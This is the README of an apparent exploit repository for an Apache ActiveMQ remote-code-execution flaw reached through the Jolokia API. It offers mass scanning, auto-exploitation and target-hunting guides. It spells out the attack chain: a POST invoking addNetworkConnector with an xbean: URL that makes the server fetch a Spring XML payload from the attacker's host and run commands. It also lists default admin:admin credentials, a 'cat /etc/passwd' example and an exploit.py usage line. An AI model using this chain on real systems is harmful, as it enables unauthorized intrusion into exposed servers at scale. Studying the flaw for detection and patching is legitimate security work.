Exploit for Apache ActiveMQ RCE via Jolokia API (CVE-2026-34197) with command output capture, mass scanning, and auto-exploitation.
Overview • Details • Attack Flow • Quick Start • ATTACKER_IP Guide • Usage • Output Capture • Scanner • Hunting • Detection • Remediation
CVE-2026-34197 is a critical Remote Code Execution (RCE) vulnerability in Apache ActiveMQ Classic that allows an authenticated attacker to execute arbitrary operating system commands through the Jolokia API exposed on the web console.
The vulnerability has existed for over 13 years and resides in the interaction between Jolokia (HTTP-JMX bridge), ActiveMQ MBeans, network connectors, and the VM transport.
[!CAUTION] This is a first public PoC developed by KONDOR DEV SECURITY. Use only in authorized security assessments.
id, whoami, cat /etc/passwd) automatically display their output in your terminalversion_check.py) — multithreaded version detection + targeted exploitation| CVE ID | CVE-2026-34197 |
| Severity | |
| Type | Remote Code Execution (RCE) |
| CWE | CWE-20 (Improper Input Validation) / CWE-94 (Code Injection) |
| Affected | ActiveMQ Classic < 5.19.4 and 6.0.0 — 6.2.2 |
| Patched | 5.19.4 / 6.2.3 |
| Auth Required | Yes (default credentials admin:admin are common) |
| No Auth Needed | 6.0.0 — 6.1.1 (due to CVE-2024-32114) |
| Default Port | 8161 (web console) |
CVE-2026-34197 — Exploitation Chain
──────────────────────────────────────────────────────────────
ATTACKER ACTIVEMQ SERVER
──────── ───────────────
│ │
[1] │── POST /api/jolokia/ ──────────────────>│
│ addNetworkConnector( │
│ vm://rce?brokerConfig= │
│ xbean:http://ATTACKER/payload.xml) │
│ │
│ [2] │── Creates VM broker
│ │── Fetches remote XML
│ │
[3] │<── GET /payload.xml ─────────────────────│
│── Serves malicious Spring XML ─────────>│
│ │
│ [4] │── Spring instantiates beans
│ │── Runtime.exec(COMMAND)
│ │── ** RCE ACHIEVED **
│ │
[5] │<── POST /output (command stdout) ────────│ (auto, for simple commands)
│── Displays command output │
│ │
| Step | Action | Component |
|---|---|---|
| 1 | Attacker sends POST to /api/jolokia/ invoking addNetworkConnector on the Broker MBean | Jolokia API |
| 2 | ActiveMQ processes the vm:// transport URI and creates an ephemeral broker with brokerConfig pointing to a remote URL | VM Transport |
| 3 | The xbean: scheme triggers download of a Spring XML configuration file from the attacker's server | Spring / XBean |
| 4 | Spring instantiates all beans in the XML, including one that calls Runtime.getRuntime().exec() | Spring Context |
| 5 | For simple commands, the output is captured and sent back via HTTP POST to the attacker's listener (automatic) | Output Capture |
CVE-2026-34197/
├── exploit.py # PoC exploit (single target + mass scan)
├── version_check.py # Scanner + Auto-Exploit (2-phase pipeline)
├── payloads/
│ └── template.xml # Spring XML payload template
├── targets.txt # Target URLs (one per line)
├── docker/
│ └── docker-compose.yml # Vulnerable lab environment
├── docs/
│ ├── HUNTING_GUIDE_EN.md # Target hunting guide (English)
│ └── HUNTING_GUIDE_ES.md # Guía de búsqueda (Español)
├── LICENSE
└── README.md
# Python 3.8+ required
pip install requests
cd docker
docker-compose up -d
# ActiveMQ Classic 5.18.6 (vulnerable) → localhost:8161
# Single target
python exploit.py -t http://TARGET:8161 -l YOUR_IP -c "id"